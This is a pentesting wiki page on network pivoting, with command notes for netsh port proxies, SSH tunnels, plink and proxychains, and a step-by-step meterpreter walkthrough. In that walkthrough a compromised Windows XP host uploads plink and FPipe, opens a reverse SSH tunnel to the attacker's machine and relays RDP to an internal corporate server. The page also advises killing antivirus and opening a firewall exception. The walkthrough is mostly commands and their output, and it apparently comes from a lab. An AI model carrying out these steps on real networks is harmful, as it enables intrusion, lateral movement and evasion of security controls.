Pivoting

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

netsh

netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>

also supports v4tov6, v6tov6, and v6tov4


ssh proxycommand

ssh -o "proxycommand ssh -W host2 host1" host2

Putty & Plink

plink -R 1234:172.16.1.80:3389 192.168.1.10

and then start an RDP session to 127.0.0.1:1234 from your backtrack box


http://blog.packetheader.net/2009/01/installing-openssh-on-windows-via.html http://3proxy.ru/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot

Although the metasploit framework meterpreter have pivoting capabilities which include Port forwarding and Routing, you may find yourself need to pivot your tools outside of the framework. For example, you may want to open a Remote Desktop connection to other internal host on the compromised network. This could be done using SSH Tunneling and Port forwarding.


Example scenario:

Attacker: Gained a meterpreter session using a client side attack from a remote location i.e : The Internet. Victim: Located on a network behind a Router/Firewall using NAT, all inbound ports are blocked. Objectives: RDP your way into the company server from  the compromised host (the victim). Setup used for this tutorial:

Attacker IP: 192.168.1.10 (running BackTrack with active SSH server)

Victim IP: 192.168.1.20 , second NIC 172.16.1.73 (connected to 172.16.1.0/24 network a windows xp pro workstation)

Corporate server IP: 172.16.1.80

I will use a vmware based lab ,all  addresses used for this tutorial are internal adresses only.

1. Once we received our meterpreter session on the attacking machine we will first upload our tools, PLINK and FPipe. meterpreter > upload plink.exe c:\\ [*] uploading  : plink.exe -> c:\ [*] uploaded   : plink.exe -> c:\\plink.exe meterpreter > upload FPipe.exe c:\\ [*] uploading  : FPipe.exe -> c:\ [*] uploaded   : FPipe.exe -> c:\\FPipe.exe 2. Open a command prompt: meterpreter > execute -i -H -f cmd.exe Process 1844 created. Channel 3 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\> 3. Create SSH tunnel back to our attacking machine using PLINK C:\>plink -P 22 -l root -pw qwe123 -C -R 3389:127.0.0.1:1234 192.168.1.10 The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's key fingerprint is: 2048 06:51:38:16:49:31:53:2d:e5:44:34:18:0c:f0:59:de If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) Y Last login: Fri Jul 17 19:49:35 2009 from 212.235.66.178 Linux 2.6.21.5. exploit ~ # Let’s take a look at the above command: plink -P "ssh server port" -l "ssh server user name" -pw "ssh server password" -C -R "local port":127.0.0.1:"remote port" "ssh server ip address" More information about SSH Tunneling can be found Here

4. Now we will send our command prompt to background by pressing CTRL+Z on the keyboard. Background channel 3? [y/N]  y [-] core_channel_interact: Operation failed: 1168 meterpreter >

  •  The command prompt is still running on the background and it is still active on the victim machine, you can resume it by typing the command  “interact” and the channel number:

meterpreter > interact 3 Interacting with channel 3... exploit ~ # 5. Open a new command prompt channel meterpreter > execute -i -H -f cmd.exe Process 3472 created. Channel 4 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\> 6. Forwarding traffic to the server using FPipe C:\>Fpipe.exe -l 1234 -s 1234 -r 3389 172.16.1.80 (You can add the -v switch for verbosity, you can also background this channel and continue working with meterpreter)

Let’s take a look at some of the FPipe options used here:

-l    – listening port number -r    – remote port number -s    – outbound source port number

  •  Please notice some A/V’s may recognize FPipe as a malicious tool and will block it.

You will have to kill a/v first or, change FPipe file signature which is not covered in this tutorial. Windows firewall may also block FPipe. in that case you can manually add it to its exception list by using the following command: c:\>netsh firewall add portopening TCP 1234 “Name of the exception” enable all




7. Now you can RDP to the server machine before we do that lets verify that our attacking is listening on port 3389. exploit ~ # netstat -antp | grep 3389 netstat -antp | grep 3389 tcp        0      0 127.0.0.1:3389          0.0.0.0:*               LISTEN     3494/4 exploit ~ # rdesktop 127.0.0.1 If everything went well a remote desktop session should open.

http://blog.packetheader.net/2009/01/installing-openssh-on-windows-via.html


Proxychains

ssh -D 1337 sean@192.168.13.251 -f -N
PASSWORD /dev/null
nano /etc/proxychains.conf
so last line reads:
socks4 127.0.0.1 1337

then do:
proxychains rdesktop 10.1.1.224


proxychains nmap -p 3389 -sT -Pn 10.1.1.236-251 --open
10.1.1.224
10.1.1.235
10.1.1.236
10.1.1.246
10.1.1.248
10.1.1.251


Port forward (proxy) traffic to remote host & port

C:\> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]